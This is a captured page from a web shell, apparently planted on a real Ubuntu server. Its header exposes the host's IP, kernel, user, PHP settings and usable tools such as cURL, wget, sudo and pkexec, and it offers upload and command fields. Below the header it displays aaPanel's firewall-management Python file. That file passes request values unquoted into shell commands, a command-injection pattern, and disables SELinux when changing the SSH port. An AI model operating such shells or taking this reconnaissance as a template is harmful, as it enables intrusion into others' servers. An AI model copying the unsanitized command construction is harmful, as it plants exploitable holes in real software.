403Webshell
Server IP : 172.67.216.182  /  Your IP : 162.158.88.162
Web Server : Apache
System : Linux krdc-ubuntu-s-2vcpu-4gb-amd-blr1-01.localdomain 5.15.0-142-generic #152-Ubuntu SMP Mon May 19 10:54:31 UTC 2025 x86_64
User : www ( 1000)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/server/panel/class_v2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/server/panel/class_v2/firewalls_v2.py
# coding: utf-8
# +-------------------------------------------------------------------
# | aaPanel x3
# +-------------------------------------------------------------------
# | Copyright (c) 2015-2016 aaPanel(www.aapanel.com) All rights reserved.
# +-------------------------------------------------------------------
# | Author: hwliang <[email protected]>
# +-------------------------------------------------------------------
import sys, os, public, re, firewalld, time
from public.validate import Param


class firewalls:
    __isFirewalld = False
    __isUfw = False
    __Obj = None

    def __init__(self):
        if os.path.exists('/usr/sbin/firewalld'): self.__isFirewalld = True
        self.__ufw = 'ufw'
        if os.path.exists('/usr/sbin/ufw'):
            self.__isUfw = True
            self.__ufw = '/usr/sbin/ufw'
        if self.__isFirewalld:
            try:
                self.__Obj = firewalld.firewalld()
                self.GetList()
            except:
                pass

    # 获取服务端列表
    def GetList(self):
        try:
            data = {}
            data['ports'] = self.__Obj.GetAcceptPortList()
            addtime = time.strftime('%Y-%m-%d %X', time.localtime())
            for i in range(len(data['ports'])):
                tmp = self.CheckDbExists(data['ports'][i]['port'])
                if not tmp: public.M('firewall').add('port,ps,addtime', (data['ports'][i]['port'], '', addtime))

            data['iplist'] = self.__Obj.GetDropAddressList()
            for i in range(len(data['iplist'])):
                try:
                    tmp = self.CheckDbExists(data['iplist'][i]['address'])
                    if not tmp: public.M('firewall').add('port,ps,addtime', (data['iplist'][i]['address'], '', addtime))
                except:
                    pass
        except:
            pass

    # 检查数据库是否存在
    def CheckDbExists(self, port):
        data = public.M('firewall').field('id,port,ps,addtime').select()
        for dt in data:
            if dt['port'] == port: return dt
        return False

    # 重载防火墙配置
    def FirewallReload(self):
        if self.__isUfw:
            public.ExecShell('/usr/sbin/ufw reload &')
            return
        if self.__isFirewalld:
            public.ExecShell('firewall-cmd --reload &')
        else:
            public.ExecShell('/etc/init.d/iptables save &')
            public.ExecShell('/etc/init.d/iptables restart &')

    # 取防火墙状态
    def CheckFirewallStatus(self):
        # if self.__isUfw:
        #     res = public.ExecShell('ufw status verbose')[0]
        #     if res.find('inactive') != -1: return False
        #     return True

        # if self.__isFirewalld:
        #     res = public.ExecShell("systemctl status firewalld")[0]
        #     if res.find('active (running)') != -1: return True
        #     if res.find('disabled') != -1: return False
        #     if res.find('inactive (dead)') != -1: return False
        # else:
        #     res = public.ExecShell("/etc/init.d/iptables status")[0]
        #     if res.find('not running') != -1: return False
        #     return True
        return public.get_firewall_status() == 1

    def SetFirewallStatus(self, get=None):
        '''
            @name 设置系统防火墙状态
            @author hwliang<2022-01-13>
        '''
        status = not self.CheckFirewallStatus()
        status_msg = {False: 'Close', True: 'Open'}
        if self.__isUfw:
            if status:
                public.ExecShell('echo y|{} enable'.format(self.__ufw))
            else:
                public.ExecShell('echo y|{} disable'.format(self.__ufw))
        if self.__isFirewalld:
            if status:
                public.ExecShell('systemctl enable firewalld')
                public.ExecShell('systemctl start firewalld')
            else:
                public.ExecShell('systemctl disable firewalld')
                public.ExecShell('systemctl stop firewalld')
        else:
            if status:
                public.ExecShell("chkconfig iptables on")
                public.ExecShell('/etc/init.d/iptables start')
            else:
                public.ExecShell("chkconfig iptables off")
                public.ExecShell('/etc/init.d/iptables stop')
        public.write_log_gettext('Firewall manager', '{} system firewall!', (status_msg[status],))
        return public.return_msg_gettext(True, '{} system firewall!', (status_msg[status],))

    # 添加屏蔽IP
    def AddDropAddress(self, get):
        if not self.CheckFirewallStatus(): return public.return_msg_gettext(False, public.lang("The system firewall is not open"))
        import time
        import re
        ip_format = get.port.split('/')[0]
        if not public.check_ip(ip_format): return public.return_msg_gettext(False, public.lang("IP address you entered is illegal!"))
        if ip_format in ['0.0.0.0', '127.0.0.0', "::1"]:
            return public.return_msg_gettext(False, public.lang("Disabling this IP will cause your server to fail"))
        address = get.port
        if public.M('firewall').where("port=?", (address,)).count() > 0:
            return public.return_msg_gettext(False, public.lang("The IP exists in block list, no need to repeat processing!"))
        if self.__isUfw:
            if public.is_ipv6(ip_format):
                public.ExecShell('{} deny from {} to any'.format(self.__ufw, address))
            else:
                public.ExecShell('{} insert 1 deny from {} to any'.format(self.__ufw, address))
        else:
            if self.__isFirewalld:
                # self.__Obj.AddDropAddress(address)
                if public.is_ipv6(ip_format):
                    public.ExecShell(
                        'firewall-cmd --permanent --add-rich-rule=\'rule family=ipv6 source address="' + address + '" drop\'')
                else:
                    public.ExecShell(
                        'firewall-cmd --permanent --add-rich-rule=\'rule family=ipv4 source address="' + address + '" drop\'')
            else:
                if public.is_ipv6(ip_format): return public.return_msg_gettext(False, public.lang("IP address is illegal!"))
                public.ExecShell('iptables -I INPUT -s ' + address + ' -j DROP')

        public.WriteLog("TYPE_FIREWALL", 'FIREWALL_DROP_IP', (address,))
        addtime = time.strftime('%Y-%m-%d %X', time.localtime())
        public.M('firewall').add('port,ps,addtime', (address, get.ps, addtime))
        self.FirewallReload()
        return public.return_msg_gettext(True, public.lang("Setup successfully!"))

    # 删除IP屏蔽
    def DelDropAddress(self, get):
        if not self.CheckFirewallStatus(): return public.return_msg_gettext(False, public.lang("The system firewall is not open"))
        address = get.port
        id = get.id
        ip_format = get.port.split('/')[0]
        if self.__isUfw:
            public.ExecShell('{} delete deny from {} to any'.format(self.__ufw, address))
        else:
            if self.__isFirewalld:
                if public.is_ipv6(ip_format):
                    public.ExecShell(
                        'firewall-cmd --permanent --remove-rich-rule=\'rule family=ipv6 source address="' + address + '" drop\'')
                else:
                    public.ExecShell(
                        'firewall-cmd --permanent --remove-rich-rule=\'rule family=ipv4 source address="' + address + '" drop\'')
            else:
                public.ExecShell('iptables -D INPUT -s ' + address + ' -j DROP')

        public.WriteLog("TYPE_FIREWALL", 'FIREWALL_ACCEPT_IP', (address,))
        public.M('firewall').where("id=?", (id,)).delete()

        self.FirewallReload()
        return public.return_msg_gettext(True, public.lang("Successfully deleted"))

    # 添加放行端口
    def AddAcceptPort(self, get):
        if not self.CheckFirewallStatus(): return public.return_msg_gettext(False, public.lang("The system firewall is not open"))
        import re
        src_port = get.port
        get.port = get.port.replace('-', ':')
        rep = r"^\d{1,5}(:\d{1,5})?$"
        if not re.search(rep, get.port):
            return public.return_msg_gettext(False, public.lang("Port range must be between 22 and 65535!"))

        import time
        port = get.port
        ps = public.xssencode2(get.ps)
        is_exists = public.M('firewall').where("port=? or port=?", (port, src_port)).count()
        if is_exists: return public.return_msg_gettext(False, public.lang("The port exists, no need to repeat the release!"))
        notudps = ['80', '443', '8888', '888', '39000:40000', '21', '22']
        if self.__isUfw:
            a = public.ExecShell('{} allow {}/tcp'.format(self.__ufw, port))
            # public.writeFile('/tmp/2',str(a))
            if not port in notudps: public.ExecShell('{} allow {}/udp'.format(self.__ufw, port))
        else:
            if self.__isFirewalld:
                # self.__Obj.AddAcceptPort(port)
                port = port.replace(':', '-')
                public.ExecShell('firewall-cmd --permanent --zone=public --add-port=' + port + '/tcp')
                if not port in notudps: public.ExecShell(
                    'firewall-cmd --permanent --zone=public --add-port=' + port + '/udp')
            else:
                public.ExecShell('iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport ' + port + ' -j ACCEPT')
                if not port in notudps: public.ExecShell(
                    'iptables -I INPUT -p tcp -m state --state NEW -m udp --dport ' + port + ' -j ACCEPT')
        public.WriteLog("TYPE_FIREWALL", 'FIREWALL_ACCEPT_PORT', (port,))
        addtime = time.strftime('%Y-%m-%d %X', time.localtime())
        if not is_exists: public.M('firewall').add('port,ps,addtime', (port, ps, addtime))
        self.FirewallReload()
        return public.return_msg_gettext(True, public.lang("Setup successfully!"))

    # 添加放行端口
    def AddAcceptPortAll(self, port, ps):
        if not self.CheckFirewallStatus(): return public.return_msg_gettext(False, public.lang("The system firewall is not open"))
        import re
        port = port.replace('-', ':')
        rep = r"^\d{1,5}(:\d{1,5})?$"
        if not re.search(rep, port):
            return False
        if self.__isUfw:
            public.ExecShell('{} allow {}/tcp'.format(self.__ufw, port))
            public.ExecShell('{} allow {}/udp'.format(self.__ufw, port))
        else:
            if self.__isFirewalld:
                port = port.replace(':', '-')
                public.ExecShell('firewall-cmd --permanent --zone=public --add-port=' + port + '/tcp')
                public.ExecShell('firewall-cmd --permanent --zone=public --add-port=' + port + '/udp')
            else:
                public.ExecShell('iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport ' + port + ' -j ACCEPT')
                public.ExecShell('iptables -I INPUT -p tcp -m state --state NEW -m udp --dport ' + port + ' -j ACCEPT')
        return True

    # 删除放行端口
    def DelAcceptPort(self, get):
        if not self.CheckFirewallStatus(): return public.return_msg_gettext(False, public.lang("The system firewall is not open"))
        port = get.port
        id = get.id

        if public.is_ipv6(port): return self.DelDropAddress(get)  # 如果是ipv6地址,则调用DelDropAddress

        try:
            if (port == public.GetHost(True) or port == public.readFile('data/port.pl').strip()):
                return public.return_msg_gettext(False, public.lang("Failed,cannot delete current port of the panel"))
            if self.__isUfw:
                public.ExecShell('{} delete allow {}/tcp'.format(self.__ufw, port))
                public.ExecShell('{} delete allow {}/udp'.format(self.__ufw, port))
            else:
                if self.__isFirewalld:
                    # self.__Obj.DelAcceptPort(port)
                    public.ExecShell('firewall-cmd --permanent --zone=public --remove-port=' + port + '/tcp')
                    public.ExecShell('firewall-cmd --permanent --zone=public --remove-port=' + port + '/udp')
                else:
                    public.ExecShell(
                        'iptables -D INPUT -p tcp -m state --state NEW -m tcp --dport ' + port + ' -j ACCEPT')
                    public.ExecShell(
                        'iptables -D INPUT -p tcp -m state --state NEW -m udp --dport ' + port + ' -j ACCEPT')
            public.WriteLog("TYPE_FIREWALL", 'FIREWALL_DROP_PORT', (port,))
            public.M('firewall').where("id=?", (id,)).delete()

            self.FirewallReload()
            return public.return_msg_gettext(True, public.lang("Successfully deleted"))
        except:
            return public.return_msg_gettext(False, public.lang("Failed to delete"))

    # 设置远程端口状态
    def SetSshStatus(self, get):
        # version = public.readFile('/etc/redhat-release')
        if int(get['status']) == 1:
            msg = public.get_msg_gettext('SSH service turned off')
            act = 'stop'
        else:
            msg = public.get_msg_gettext('SSH service turned on')
            act = 'start'

        # if not os.path.exists('/etc/redhat-release'):
        #     public.ExecShell('service ssh ' + act)
        # elif version.find(' 7.') != -1 or version.find(' 8.') != -1 or version.find('Fedora') != -1:
        #     public.ExecShell("systemctl "+act+" sshd")
        # else:
        # 全试一次?
        public.ExecShell("/etc/init.d/sshd " + act)
        public.ExecShell('service ssh ' + act)
        public.ExecShell("systemctl " + act + " sshd")
        public.ExecShell("systemctl " + act + " ssh")
        if act in ['start'] and not public.get_sshd_status():
            msg = 'SSHD service failed to start'
            public.WriteLog("TYPE_FIREWALL", msg)
            return public.return_message(-1, 0, msg)
        public.WriteLog("TYPE_FIREWALL", msg)
        return public.return_message(0, 0, public.lang("Setup successfully!"))

    # 设置ping
    def SetPing(self, get):
        if get.status == '1':
            get.status = '0'
        else:
            get.status = '1'
        filename = '/etc/sysctl.conf'
        conf = public.readFile(filename)
        if conf.find('net.ipv4.icmp_echo') != -1:
            rep = r"net\.ipv4\.icmp_echo.*"
            conf = re.sub(rep, 'net.ipv4.icmp_echo_ignore_all=' + get.status + "\n", conf)
        else:
            conf += "\nnet.ipv4.icmp_echo_ignore_all=" + get.status + "\n"

        if public.writeFile(filename, conf):
            public.ExecShell('sysctl -p')
            return public.return_message(0, 0, public.lang("SUCCESS"))
        else:
            return public.return_message(-1, 0, '<a style="color:red;">ERROR: setup failed, [sysctl.conf] not writable!</a><br>1. If [System hardening] is installed, please close it first<br>')

    # 改远程端口
    def SetSshPort(self, get):

        # 校验参数
        try:
            get.validate([
                Param('port').Require().Number(">=", 22).Number("<=", 65535).Xss(),
            ], [
                public.validate.trim_filter(),
            ])
        except Exception as ex:
            public.print_log("error info: {}".format(ex))
            return public.return_message(-1, 0, str(ex))

        port = get.port

        ports = ['21', '25', '80', '443', '8080', '888', '8888', '7800']
        if port in ports:
            # return public.return_msg_gettext(False, public.lang("Do NOT use common default port!"))
            return public.return_message(-1, 0, public.lang("Do NOT use common default port!"))
        file = '/etc/ssh/sshd_config'
        conf = public.readFile(file)

        rep = r"#*Port\s+([0-9]+)\s*\n"
        conf = re.sub(rep, "Port " + port + "\n", conf)
        public.writeFile(file, conf)

        if self.__isFirewalld:
            public.ExecShell('firewall-cmd --permanent --zone=public --add-port=' + port + '/tcp')
            public.ExecShell('setenforce 0')
            public.ExecShell('sed -i "s#SELINUX=enforcing#SELINUX=disabled#" /etc/selinux/config')
            public.ExecShell("systemctl restart sshd.service")
        elif self.__isUfw:
            public.ExecShell('{} allow {}/tcp'.format(self.__ufw, port))
            public.ExecShell("service ssh restart")
        else:
            public.ExecShell('iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport ' + port + ' -j ACCEPT')
            public.ExecShell("/etc/init.d/sshd restart")

        self.FirewallReload()
        public.M('firewall').where("ps=? or ps=? or port=?",
                                   ('SSH remote management service', 'SSH remote service', port)).delete()
        public.M('firewall').add('port,ps,addtime',
                                 (port, 'SSH remote service', time.strftime('%Y-%m-%d %X', time.localtime())))
        public.WriteLog("TYPE_FIREWALL", "FIREWALL_SSH_PORT", (port,))
        # return public.return_msg_gettext(True, public.lang("Setup successfully!"))
        return public.return_message(0, 0, public.lang("Setup successfully!"))

    # 取SSH信息
    def GetSshInfo(self, get):
        port = public.get_sshd_port()
        status = public.get_sshd_status()
        isPing = True
        try:
            file = '/etc/sysctl.conf'
            conf = public.readFile(file)
            rep = r"#*net\.ipv4\.icmp_echo_ignore_all\s*=\s*([0-9]+)"
            tmp = re.search(rep, conf).groups(0)[0]
            if tmp == '1': isPing = False
        except:
            isPing = True

        data = {}
        data['port'] = port
        data['status'] = status
        data['ping'] = isPing
        data['firewall_status'] = self.CheckFirewallStatus()
        # return data
        return public.return_message(0, 0, data)


Youez - 2016 - github.com/yon3zu
LinuXploit